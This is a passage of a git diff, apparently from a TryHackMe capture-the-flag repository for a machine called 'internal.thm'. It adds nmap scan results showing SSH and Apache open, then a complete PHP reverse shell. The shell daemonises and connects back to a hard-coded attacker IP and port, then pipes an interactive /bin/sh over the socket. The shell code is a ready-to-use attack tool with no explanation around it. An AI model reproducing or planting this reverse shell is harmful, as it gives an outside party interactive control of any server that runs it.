5910-5911,5915,5922,5925,5950,5952,5959-5963,5987-5989,5998-6007,6009,6025,6059,6100-6101,6106,6112,6123,6129,6156,6346,6389,6502,6510,6543,6547,6565-6567,6580,6646,6666-6669,6689,6692,6699,6779,6788-6789,6792,6839,6881,6901,6969,7000-7002,7004,7007,7019,7025,7070,7100,7103,7106,7200-7201,7402,7435,7443,7496,7512,7625,7627,7676,7741,7777-7778,7800,7911,7920-7921,7937-7938,7999-8002,8007-8011,8021-8022,8031,8042,8045,8080-8090,8093,8099-8100,8180-8181,8192-8194,8200,8222,8254,8290-8292,8300,8333,8383,8400,8402,8443,8500,8600,8649,8651-8652,8654,8701,8800,8873,8888,8899,8994,9000-9003,9009-9011,9040,9050,9071,9080-9081,9090-9091,9099-9103,9110-9111,9200,9207,9220,9290,9415,9418,9485,9500,9502-9503,9535,9575,9593-9595,9618,9666,9876-9878,9898,9900,9917,9929,9943-9944,9968,9998-10004,10009-10010,10012,10024-10025,10082,10180,10215,10243,10566,10616-10617,10621,10626,10628-10629,10778,11110-11111,11967,12000,12174,12265,12345,13456,13722,13782-13783,14000,14238,14441-14442,15000,15002-15004,15660,15742,16000-16001,16012,16016,16018,16080,16113,16992-16993,17877,17988,18040,18101,18988,19101,19283,19315,19350,19780,19801,19842,20000,20005,20031,20221-20222,20828,21571,22939,23502,24444,24800,25734-25735,26214,27000,27352-27353,27355-27356,27715,28201,30000,30718,30951,31038,31337,32768-32785,33354,33899,34571-34573,35500,38292,40193,40911,41511,42510,44176,44442-44443,44501,45100,48080,49152-49161,49163,49165,49167,49175-49176,49400,49999-50003,50006,50300,50389,50500,50636,50800,51103,51493,52673,52822,52848,52869,54045,54328,55055-55056,55555,55600,56737-56738,57294,57797,58080,60020,60443,61532,61900,62078,63331,64623,64680,65000,65129,65389"/>
+<verbose level="0"/>
+<debugging level="0"/>
+<host starttime="1646117021" endtime="1646117056"><status state="up" reason="syn-ack" reason_ttl="0"/>
+<address addr="10.10.252.197" addrtype="ipv4"/>
+<hostnames>
+<hostname name="internal.thm" type="PTR"/>
+</hostnames>
+<ports><extraports state="closed" count="998">
+<extrareasons reason="conn-refused" count="998"/>
+</extraports>
+<port protocol="tcp" portid="22"><state state="open" reason="syn-ack" reason_ttl="0"/><service name="ssh" product="OpenSSH" version="7.6p1 Ubuntu 4ubuntu0.3" extrainfo="Ubuntu Linux; protocol 2.0" ostype="Linux" method="probed" conf="10"><cpe>cpe:/a:openbsd:openssh:7.6p1</cpe><cpe>cpe:/o:linux:linux_kernel</cpe></service><script id="ssh-hostkey" output="&#xa;  2048 6e:fa:ef:be:f6:5f:98:b9:59:7b:f7:8e:b9:c5:62:1e (RSA)&#xa;  256 ed:64:ed:33:e5:c9:30:58:ba:23:04:0d:14:eb:30:e9 (ECDSA)&#xa;  256 b0:7f:7f:7b:52:62:62:2a:60:d4:3d:36:fa:89:ee:ff (ED25519)"><table>
+<elem key="key">AAAAB3NzaC1yc2EAAAADAQABAAABAQCzpZTvmUlaHPpKH8X2SHMndoS+GsVlbhABHJt4TN/nKUSYeFEHbNzutQnj+DrUEwNMauqaWCY7vNeYguQUXLx4LM5ukMEC8IuJo0rcuKNmlyYrgBlFws3q2956v8urY7/McCFf5IsItQxurCDyfyU/erO7fO02n2iT5k7Bw2UWf8FPvM9/jahisbkA9/FQKou3mbaSANb5nSrPc7p9FbqKs1vGpFopdUTI2dl4OQ3TkQWNXpvaFl0j1ilRynu5zLr6FetD5WWZXAuCNHNmcRo/aPdoX9JXaPKGCcVywqMM/Qy+gSiiIKvmavX6rYlnRFWEp25EifIPuHQ0s8hSXqx5</elem>
+<elem key="type">ssh-rsa</elem>
+<elem key="fingerprint">6efaefbef65f98b9597bf78eb9c5621e</elem>
+<elem key="bits">2048</elem>
+</table>
+<table>
+<elem key="key">AAAAE2VjZHNhLXNoYTItbmlzdHAyNTYAAAAIbmlzdHAyNTYAAABBBMFOI/P6nqicmk78vSNs4l+vk2+BQ0mBxB1KlJJPCYueaUExTH4Cxkqkpo/zJfZ77MHHDL5nnzTW+TO6e4mDMEw=</elem>
+<elem key="type">ecdsa-sha2-nistp256</elem>
+<elem key="fingerprint">ed64ed33e5c93058ba23040d14eb30e9</elem>
+<elem key="bits">256</elem>
+</table>
+<table>
+<elem key="key">AAAAC3NzaC1lZDI1NTE5AAAAIMlxubXGh//FE3OqdyitiEwfA2nNdCtdgLfDQxFHPyY0</elem>
+<elem key="type">ssh-ed25519</elem>
+<elem key="fingerprint">b07f7f7b5262622a60d43d36fa89eeff</elem>
+<elem key="bits">256</elem>
+</table>
+</script></port>
+<port protocol="tcp" portid="80"><state state="open" reason="syn-ack" reason_ttl="0"/><service name="http" product="Apache httpd" version="2.4.29" extrainfo="(Ubuntu)" method="probed" conf="10"><cpe>cpe:/a:apache:http_server:2.4.29</cpe></service><script id="http-server-header" output="Apache/2.4.29 (Ubuntu)"><elem>Apache/2.4.29 (Ubuntu)</elem>
+</script><script id="http-title" output="Apache2 Ubuntu Default Page: It works"><elem key="title">Apache2 Ubuntu Default Page: It works</elem>
+</script></port>
+</ports>
+<times srtt="175049" rttvar="2937" to="186797"/>
+</host>
+<runstats><finished time="1646117056" timestr="Tue Mar  1 12:14:16 2022" elapsed="34.54" summary="Nmap done at Tue Mar  1 12:14:16 2022; 1 IP address (1 host up) scanned in 34.54 seconds" exit="success"/><hosts up="1" down="0" total="1"/>
+</runstats>
+</nmaprun>
diff --git a/internal/nmap/initial.nmap b/internal/nmap/initial.nmap
new file mode 100644
index 0000000..32501ae
--- /dev/null
+++ b/internal/nmap/initial.nmap
@@ -0,0 +1,17 @@
+# Nmap 7.80 scan initiated Tue Mar  1 12:13:41 2022 as: nmap -sC -sV -oA nmap/initial 10.10.252.197
+Not shown: 998 closed ports
+Nmap scan report for internal.thm (10.10.252.197)
+Host is up (0.18s latency).
+PORT   STATE SERVICE VERSION
+22/tcp open  ssh     OpenSSH 7.6p1 Ubuntu 4ubuntu0.3 (Ubuntu Linux; protocol 2.0)
+| ssh-hostkey:
+|   2048 6e:fa:ef:be:f6:5f:98:b9:59:7b:f7:8e:b9:c5:62:1e (RSA)
+|   256 ed:64:ed:33:e5:c9:30:58:ba:23:04:0d:14:eb:30:e9 (ECDSA)
+|_  256 b0:7f:7f:7b:52:62:62:2a:60:d4:3d:36:fa:89:ee:ff (ED25519)
+80/tcp open  http    Apache httpd 2.4.29 ((Ubuntu))
+|_http-server-header: Apache/2.4.29 (Ubuntu)
+|_http-title: Apache2 Ubuntu Default Page: It works
+Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel
+
+Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
+# Nmap done at Tue Mar  1 12:14:16 2022 -- 1 IP address (1 host up) scanned in 34.54 seconds
diff --git a/internal/php-reverse-shell.php b/internal/php-reverse-shell.php
new file mode 100644
index 0000000..c9b702a
--- /dev/null
+++ b/internal/php-reverse-shell.php
@@ -0,0 +1,92 @@
+<?php
+set_time_limit (0);
+$VERSION = "1.0";
+$ip = '10.17.36.210';  // CHANGE THIS
+$port = 9455;       // CHANGE THIS
+$chunk_size = 1400;
+$write_a = null;
+$error_a = null;
+$shell = 'uname -a; w; id; /bin/sh -i';
+$daemon = 0;
+$debug = 0;
+
+if (function_exists('pcntl_fork')) {
+	$pid = pcntl_fork();
+	if ($pid == -1) {
+		printit("ERROR: Can't fork");
+		exit(1);
+	}
+	if ($pid) {
+		exit(0);
+	}
+	if (posix_setsid() == -1) {
+		printit("Error: Can't setsid()");
+		exit(1);
+	}
+	$daemon = 1;
+} else {
+	printit("WARNING: Failed to daemonise.  This is quite common and not fatal.");
+}
+chdir("/");
+umask(0);
+$sock = fsockopen($ip, $port, $errno, $errstr, 30);
+if (!$sock) {
+	printit("$errstr ($errno)");
+	exit(1);
+}
+$descriptorspec = array(
+   0 => array("pipe", "r"),
+   1 => array("pipe", "w"),
+   2 => array("pipe", "w")
+);
+$process = proc_open($shell, $descriptorspec, $pipes);
+if (!is_resource($process)) {
+	printit("ERROR: Can't spawn shell");
+	exit(1);
+}
+stream_set_blocking($pipes[0], 0);
+stream_set_blocking($pipes[1], 0);
+stream_set_blocking($pipes[2], 0);
+stream_set_blocking($sock, 0);
+printit("Successfully opened reverse shell to $ip:$port");
+while (1) {
+	if (feof($sock)) {
+		printit("ERROR: Shell connection terminated");
+		break;
+	}
+	if (feof($pipes[1])) {
+		printit("ERROR: Shell process terminated");
+		break;
+	}
+	$read_a = array($sock, $pipes[1], $pipes[2]);
+	$num_changed_sockets = stream_select($read_a, $write_a, $error_a, null);
+	if (in_array($sock, $read_a)) {
+		if ($debug) printit("SOCK READ");
+		$input = fread($sock, $chunk_size);
+		if ($debug) printit("SOCK: $input");
+		fwrite($pipes[0], $input);
+	}
+	if (in_array($pipes[1], $read_a)) {
+		if ($debug) printit("STDOUT READ");
+		$input = fread($pipes[1], $chunk_size);
+		if ($debug) printit("STDOUT: $input");
+		fwrite($sock, $input);
+	}
+	if (in_array($pipes[2], $read_a)) {
+		if ($debug) printit("STDERR READ");
+		$input = fread($pipes[2], $chunk_size);
+		if ($debug) printit("STDERR: $input");
+		fwrite($sock, $input);
+	}
+}
+fclose($sock);
+fclose($pipes[0]);
+fclose($pipes[1]);
+fclose($pipes[2]);
+proc_close($process);
+function printit ($string) {
+	if (!$daemon) {
+		print "$string\n";
+	}
+}
+?>
-- 
cgit v1.2.3